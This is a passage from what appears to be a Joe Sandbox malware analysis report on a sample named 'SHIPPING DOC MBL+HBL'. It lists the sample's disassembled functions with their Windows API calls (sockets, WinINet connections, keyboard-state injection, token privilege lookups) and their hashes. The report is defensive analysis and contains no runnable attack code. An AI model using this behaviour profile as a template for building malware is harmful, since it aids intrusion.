                    • Opcode ID: d1a538efc6a8b5f978d51f0e219664d0e2a22f0e7a5c1a8fdc897729c5a7f762
                    • Instruction ID: cdd3b415cfae9f7c67f81848641b10af932a2683a72138b2e42f63caa4a69cbf
                    • Opcode Fuzzy Hash: d1a538efc6a8b5f978d51f0e219664d0e2a22f0e7a5c1a8fdc897729c5a7f762
                    • Instruction Fuzzy Hash: F2C14B716083119FC704DF28C48196ABBE4FF89718F14996EF899AB392D731E945CF82
                    Function 00E781A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00E781D8
                    • CoUninitialize.OLE32 ref: 00E781E3
                      • Part of subcall function 00E5D87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D8E3
                    • VariantInit.OLEAUT32(?), ref: 00E781EE
                    • VariantClear.OLEAUT32(?), ref: 00E784BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: ae2598a06488ffc5a4c8319809fb68ba3afdd0c2904beb49fddf327eb1e129d8
                    • Instruction ID: dd11c6e270238fc60d0f535366c5beb4d1cce92e2be36cfa8b9c87b0b1d69e5a
                    • Opcode Fuzzy Hash: ae2598a06488ffc5a4c8319809fb68ba3afdd0c2904beb49fddf327eb1e129d8
                    • Instruction Fuzzy Hash: 46A16A756447019FDB10DF58C989B6AB7E4BF98724F04944CF99AAB3A2CB30ED44CB42
                    Function 00E56BD3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: bd939a1e06addee710ebabb785e41ccc90967352e3b14fc7fc770db03351eb88
                    • Instruction ID: 99cd8777fccaaafa0b53552bf5dcf91f174b76390545ae77e154079616986d50
                    • Opcode Fuzzy Hash: bd939a1e06addee710ebabb785e41ccc90967352e3b14fc7fc770db03351eb88
                    • Instruction Fuzzy Hash: B351A6307443029BDB20AF65D495A69F3F5EF44315F60AC2FE996FB2A1DA7098888711
                    Function 00E89826 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(00FCE200,?), ref: 00E89895
                    • ScreenToClient.USER32(00000002,00000002), ref: 00E898C8
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E89935
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 66c598728f059cbfdeb5cf1dd2d0736a015c3396de9d935c02680acd00f5e027
                    • Instruction ID: 16bd0d1ac88f357f19451b34501878ac0c228b920bcf46ec061276c2f53a5937
                    • Opcode Fuzzy Hash: 66c598728f059cbfdeb5cf1dd2d0736a015c3396de9d935c02680acd00f5e027
                    • Instruction Fuzzy Hash: EC511C35A00209AFCF14EF54D980ABE7BB5EF85324F149169F85DAB2A1D731AD81CB90
                    Function 00E76AC0 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00E76AE7
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76AF7
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E76B5B
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76B67
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    • Opcode ID: d7ec7d00ea74ed3903f0d9e6e3c612750df8cf83b6f2c42b32d6b32d2f974fce
                    • Instruction ID: a599346a401085015ba8006d078e2da29c893d4fe538c2d251bcf3247028a736
                    • Opcode Fuzzy Hash: d7ec7d00ea74ed3903f0d9e6e3c612750df8cf83b6f2c42b32d6b32d2f974fce
                    • Instruction Fuzzy Hash: C741B035740600AFEB24AF28DC86F3A77E9AF44B14F449418FA59BB2D3DA709C418B91
                    Function 00E76530 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E8F910), ref: 00E765BD
                    • _strlen.LIBCMT ref: 00E765EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    • Opcode ID: ff07ff712d6206e0c8d92f59e4ddaeab84d0a921bf9cd2145ea393942bbb5928
                    • Instruction ID: 16671a40a983808790dc5f23a75e84451a1eccd5d6f63cb9a798dd2d71cb9542
                    • Opcode Fuzzy Hash: ff07ff712d6206e0c8d92f59e4ddaeab84d0a921bf9cd2145ea393942bbb5928
                    • Instruction Fuzzy Hash: B941D331A00504AFCB14EBA4EDD5EAEB3E9EF44314F549155F819BB2D2DB30AD44CB51
                    Function 00E6B880 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E6B92A
                    • GetLastError.KERNEL32(?,00000000), ref: 00E6B950
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E6B975
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E6B9A1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 088bef4657493450c21b7bce75156f02f9495de7870a43628e19588addae3e79
                    • Instruction ID: 891cdb7cec19d7af7036bef4096e8e1ed9651c0c5397cb923fb50b92cf6892b2
                    • Opcode Fuzzy Hash: 088bef4657493450c21b7bce75156f02f9495de7870a43628e19588addae3e79
                    • Instruction Fuzzy Hash: 69412839600610DFCB10EF59D484A59BBF1EF89314B099098E94AAB7A3CB30FD80CB91
                    Function 00E88883 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E88910
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 81b09688cd49f0e3753d9ab50f59e49b3083a96265cad798055c3f6be632683c
                    • Instruction ID: f58abd2b88bab324ec6e9a346852b8a6fc6fb0a8fe8205c3938b9ed4e65708eb
                    • Opcode Fuzzy Hash: 81b09688cd49f0e3753d9ab50f59e49b3083a96265cad798055c3f6be632683c
                    • Instruction Fuzzy Hash: E731E334640108BFEF24AE58CE49BB837A5EB85314FD06126FE5DF62E0CE31A9809742
                    Function 00E8AB69 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00E8AB92
                    • GetWindowRect.USER32(?,?), ref: 00E8AC08
                    • PtInRect.USER32(?,?,00E8C07E), ref: 00E8AC18
                    • MessageBeep.USER32(00000000), ref: 00E8AC89
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: ba6831bad3eef864172a88b1f61fc48a5c4f5ecd18af3b025f7adc07df6c4b51
                    • Instruction ID: 98abf6983174126790755e2474b1df353606008db3da5e660dfe752e3d9b29ec
                    • Opcode Fuzzy Hash: ba6831bad3eef864172a88b1f61fc48a5c4f5ecd18af3b025f7adc07df6c4b51
                    • Instruction Fuzzy Hash: 75418D71600114DFEB15EF59C884EA9BBF5FB48314F1891BAE41CAB261D731A845CB92
                    Function 00E60E07 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E60E58
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E60E74
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E60EDA
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E60F2C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 699d893639c91ff2c8b12a6f118477fa8113d08fb985c197ca80ed9bd059f824
                    • Instruction ID: c762dee1eea4856be191e2012bdebc3d8901e1249f0596e5cca257e06a186ad7
                    • Opcode Fuzzy Hash: 699d893639c91ff2c8b12a6f118477fa8113d08fb985c197ca80ed9bd059f824
                    • Instruction Fuzzy Hash: 5A315930AC0238AEFF348B25A814BFB7BA5EB483A4F18661AF094711D1C3768D459791
                    Function 00E60F42 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E60F97
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E60FB3
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E61012
                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E61064
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 9e12edd9c7047f947f617d47c20afc740561ad826fd1e4eaa3c947809075da68
                    • Instruction ID: 818b389bb0283b228d91804de3f53b66a7ea57b295528be0c5cfb1c5de883efb
                    • Opcode Fuzzy Hash: 9e12edd9c7047f947f617d47c20afc740561ad826fd1e4eaa3c947809075da68
                    • Instruction Fuzzy Hash: A4319E30AC0298DEFF318B25E8087FB77A6AB44395F1C525AE045711E1C3744DC59791
                    Function 00E36345 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E3637B
                    • __isleadbyte_l.LIBCMT ref: 00E363A9
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E363D7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E3640D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: c695a8702ac91ebabe83979bb3b96146df07a1d004acbe61138e71d0b0f437f1
                    • Instruction ID: 141f8ac902f8f9da9dc898b350a11c2bb85a814f25d31cb2139ea75debe8affa
                    • Opcode Fuzzy Hash: c695a8702ac91ebabe83979bb3b96146df07a1d004acbe61138e71d0b0f437f1
                    • Instruction Fuzzy Hash: 5A31B031A00256FFDB218F75C888BAE7FB5FF81314F159029E864AB1A1E731D850DBA0
                    Function 00E84F57 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32 ref: 00E84F6B
                      • Part of subcall function 00E63685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E6369F
                      • Part of subcall function 00E63685: GetCurrentThreadId.KERNEL32 ref: 00E636A6
                      • Part of subcall function 00E63685: AttachThreadInput.USER32(00000000,?,00E650AC), ref: 00E636AD
                    • GetCaretPos.USER32(?), ref: 00E84F7C
                    • ClientToScreen.USER32(00000000,?), ref: 00E84FB7
                    • GetForegroundWindow.USER32 ref: 00E84FBD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: 47de9d391407a5eb36391f4f2f3d733d09136974f2d7f8443bc800ec012c640f
                    • Instruction ID: 3072ece534d201473379bcfbb8e361bf02ecd8c861e6c60a79a549fefa8a10d2
                    • Opcode Fuzzy Hash: 47de9d391407a5eb36391f4f2f3d733d09136974f2d7f8443bc800ec012c640f
                    • Instruction Fuzzy Hash: 4E311E72A00108AFDB00EFB5C8859EFB7F9EF98304F11506AE515F7252EA759E45CBA0
                    Function 00E8C502 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • GetCursorPos.USER32(?), ref: 00E8C53C
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E3BB2B,?,?,?,?,?), ref: 00E8C551
                    • GetCursorPos.USER32(?), ref: 00E8C59E
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E3BB2B,?,?,?), ref: 00E8C5D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: 272930275b51b0ec2b112ba8db0cd8556b9e0786d81cbc9595c5e20bc0416160
                    • Instruction ID: 25a693c5eae38c3364574c9c3b4d07000cdf9b348a363972a334ed52fadd9c8e
                    • Opcode Fuzzy Hash: 272930275b51b0ec2b112ba8db0cd8556b9e0786d81cbc9595c5e20bc0416160
                    • Instruction Fuzzy Hash: 5A31D236600418AFCF15DF55D858EEA7BF9EB4A310F144069F90DAB2A1C731AD51DBA0
                    Function 00E5897E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E58432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58449
                      • Part of subcall function 00E58432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E58453
                      • Part of subcall function 00E58432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58462
                      • Part of subcall function 00E58432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58469
                      • Part of subcall function 00E58432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5847F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E589CB
                    • _memcmp.LIBCMT ref: 00E589EE
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E58A24
                    • HeapFree.KERNEL32(00000000), ref: 00E58A2B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 087f5ee60a7e45e90457d49404e74c8a0512a4d1b9562552c58a5fed3b6733a0
                    • Instruction ID: b6a6f5a664cccc0455126d2217cc12f5f12729b52d81c1c4a9f3c27f1a08e739
                    • Opcode Fuzzy Hash: 087f5ee60a7e45e90457d49404e74c8a0512a4d1b9562552c58a5fed3b6733a0
                    • Instruction Fuzzy Hash: C9219C31E40108EFCB10DFA4CA45BFEB7B8EF40306F144859E858B7241DB30AA09CB51
                    Function 00E20B0C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • __setmode.LIBCMT ref: 00E20B2E
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E6793F,?,?,00000000), ref: 00E05B8C
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E6793F,?,?,00000000,?,?), ref: 00E05BB0
                    • _fprintf.LIBCMT ref: 00E20B65
                    • OutputDebugStringW.KERNEL32(?), ref: 00E56111
                      • Part of subcall function 00E24C1A: _flsall.LIBCMT ref: 00E24C33
                    • __setmode.LIBCMT ref: 00E20B9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: 5c61d11667aecbf09900641156544909db344b906e631296ea4b0646d4d79255
                    • Instruction ID: 738b5e8a24d67a21c120f16d2f0ff08699f081406dfa895d2b4f527a4909886f
                    • Opcode Fuzzy Hash: 5c61d11667aecbf09900641156544909db344b906e631296ea4b0646d4d79255
                    • Instruction Fuzzy Hash: 231136729042287EDB18B7B4BC43DBE7BE99F45320F14216AF108B71D3EE215C8647A5
                    Function 00E7187D Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E718B9
                      • Part of subcall function 00E71943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E71962
                      • Part of subcall function 00E71943: InternetCloseHandle.WININET(00000000), ref: 00E719FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
